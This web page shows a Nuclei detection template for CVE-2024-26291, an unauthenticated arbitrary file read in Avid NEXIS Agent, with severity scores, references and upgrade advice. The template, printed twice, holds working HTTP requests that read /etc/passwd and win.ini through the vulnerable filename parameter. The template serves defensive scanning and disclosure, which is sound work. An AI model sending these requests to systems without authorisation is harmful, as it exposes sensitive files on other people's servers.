Avid NEXIS Agent - Arbitrary File Read

CVE-2024-26291

Verified

Description

Avid NEXIS E-series, F-series, PRO+, and System Director Appliance (SDA+) before 2025.5.1 contain an unauthenticated arbitrary file read caused by improper validation of the filename parameter, letting unauthenticated attackers read sensitive files, exploit requires no authentication.

Severity

High

CVSS Score

7.5

Exploit Probability

Affected Product

nexis

Published Date

April 22, 2026

Template Author

dhiyaneshdk

CVE-2024-26291.yaml

id: CVE-2024-26291

info:
  name: Avid NEXIS Agent - Arbitrary File Read
  author: DhiyaneshDK
  severity: high
  description: |
    Avid NEXIS E-series, F-series, PRO+, and System Director Appliance (SDA+) before 2025.5.1 contain an unauthenticated arbitrary file read caused by improper validation of the filename parameter, letting unauthenticated attackers read sensitive files, exploit requires no authentication.
  impact: |
    Unauthenticated attackers can read sensitive files with highest privileges, potentially exposing critical information.
  remediation: Upgrade to Avid NEXIS version 2025.5.1 or later.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2024-26291
    - https://raeph123.github.io/BlogPosts/Avid_Nexis/Advisory_Avid_Nexus_Agent_Multiple_Vulnerabilities_en.html
    - https://kb.avid.com/pkb/articles/troubleshooting/en239659
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2024-26291
    epss-score: 0.01204
    epss-percentile: 0.79178
    cwe-id: CWE-285
  metadata:
    verified: true
    max-request: 2
    vendor: avid
    product: nexis
    fofa-query: body="Avid Nexis"
  tags: cve,cve2024,avid,nexis,lfi,file-read,gsoap

flow: http(1) || http(2)

http:
  - raw:
      - |
        GET /logs?filename=%2Fetc%2Fpasswd HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        name: linux
        dsl:
          - 'status_code == 200'
          - 'contains(body, "root:")'
          - 'contains(header, "gSOAP")'
        condition: and

  - raw:
      - |
        GET /logs?filename=C%3A%5CWindows%5Cwin.ini HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        name: windows
        dsl:
          - 'status_code == 200'
          - 'contains(body, "[fonts]") || contains(body, "[extensions]")'
          - 'contains(header, "gSOAP")'
        condition: and
# digest: 4a0a00473045022100f4714f14e3b1b490c5df69f872d7729c2b89cf1b443920e89e7395e7a27a679f022007113df5b9f932d286c1bfe33125bfb09510089ef1a4ad424540c65b161eb5be:922c64590222798bb761d5b6d8e72950

7.5Score

CVSS Metrics

CVSS Vector:

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

CVE ID:

cve-2024-26291

CWE ID:

cwe-285

References

https://nvd.nist.gov/vuln/detail/CVE-2024-26291 https://raeph123.github.io/BlogPosts/Avid_Nexis/Advisory_Avid_Nexus_Agent_Multiple_Vulnerabilities_en.html https://kb.avid.com/pkb/articles/troubleshooting/en239659

Remediation Steps

Upgrade to Avid NEXIS version 2025.5.1 or later.

id: CVE-2024-26291

info:
  name: Avid NEXIS Agent - Arbitrary File Read
  author: DhiyaneshDK
  severity: high
  description: |
    Avid NEXIS E-series, F-series, PRO+, and System Director Appliance (SDA+) before 2025.5.1 contain an unauthenticated arbitrary file read caused by improper validation of the filename parameter, letting unauthenticated attackers read sensitive files, exploit requires no authentication.
  impact: |
    Unauthenticated attackers can read sensitive files with highest privileges, potentially exposing critical information.
  remediation: Upgrade to Avid NEXIS version 2025.5.1 or later.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2024-26291
    - https://raeph123.github.io/BlogPosts/Avid_Nexis/Advisory_Avid_Nexus_Agent_Multiple_Vulnerabilities_en.html
    - https://kb.avid.com/pkb/articles/troubleshooting/en239659
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2024-26291
    epss-score: 0.01204
    epss-percentile: 0.79178
    cwe-id: CWE-285
  metadata:
    verified: true
    max-request: 2
    vendor: avid
    product: nexis
    fofa-query: body="Avid Nexis"
  tags: cve,cve2024,avid,nexis,lfi,file-read,gsoap

flow: http(1) || http(2)

http:
  - raw:
      - |
        GET /logs?filename=%2Fetc%2Fpasswd HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        name: linux
        dsl:
          - 'status_code == 200'
          - 'contains(body, "root:")'
          - 'contains(header, "gSOAP")'
        condition: and

  - raw:
      - |
        GET /logs?filename=C%3A%5CWindows%5Cwin.ini HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        name: windows
        dsl:
          - 'status_code == 200'
          - 'contains(body, "[fonts]") || contains(body, "[extensions]")'
          - 'contains(header, "gSOAP")'
        condition: and
# digest: 4a0a00473045022100f4714f14e3b1b490c5df69f872d7729c2b89cf1b443920e89e7395e7a27a679f022007113df5b9f932d286c1bfe33125bfb09510089ef1a4ad424540c65b161eb5be:922c64590222798bb761d5b6d8e72950

Avid NEXIS Agent - Arbitrary File Read

Description

Severity

CVSS Score

Exploit Probability

Affected Product

Published Date

Template Author

Nuclei Template

CVSS Metrics

References

Remediation Steps

Avid NEXIS Agent - Arbitrary File Read

Description

Severity

CVSS Score

Exploit Probability

Affected Product

Published Date

Template Author

Nuclei Template

CVSS Metrics

References

Remediation Steps